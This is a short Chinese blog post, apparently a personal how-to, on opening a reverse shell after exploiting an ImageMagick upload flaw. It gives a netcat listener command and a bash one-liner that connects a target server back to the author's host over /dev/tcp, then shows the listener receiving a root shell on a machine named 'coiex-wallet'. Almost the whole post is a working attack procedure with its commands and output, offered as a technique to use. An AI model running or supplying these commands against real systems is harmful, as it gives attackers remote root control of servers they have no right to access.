Home Hacker 攻击方式 反弹shellreboundshell
Post
Cancel

Hacker 攻击方式 反弹shellreboundshell

参考:http://www.codeblogbt.com/archives/127544

这个英文文章对于反弹有比较详细的 bash  命令的说明

另外,也参考:http://foreversong.cn/archives/1251

这里是 乌云 的一个实际例子 http://www.anquan.us/static/bugs/wooyun-2016-0205901.html   (先使用ImageMagick 上传图片,执行shell, 然后在该shell中“反向SHELL(类似一个socket client)”到自己的服务器。然后在服务器端开启 nc (类似于一个 socket server))

然后到自己的服务器中, 就可以执行命令了。 

具体步骤:

1. 在"自己的"机器上,执行命令:  $ nc -lvnp 4444   

nc 是系统自带的命令  ( man nc 就可以查看),   4444 表示运行在本机的 4444 端口

2. 在远程服务器上, 执行命令   $ bash -i >& /dev/tcp/siwei.me/4444 0>&1

该命令表示, 在 "目标服务器上" ,发起对于 "自己服务器" 的链接 

3. 可以在 "自己的服务器"上,看到, 连接已经建立了.

nc -lvnp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [47.74.33.90] port 4444 [tcp/*] accepted (family 2, sport 39350)
root@coiex-wallet:~# 
接下来就可以在"自己的服务器上" 实现了 SSH的形式,来操作远程服务器了. (太NB了)
This post is licensed under CC BY 4.0 by the author.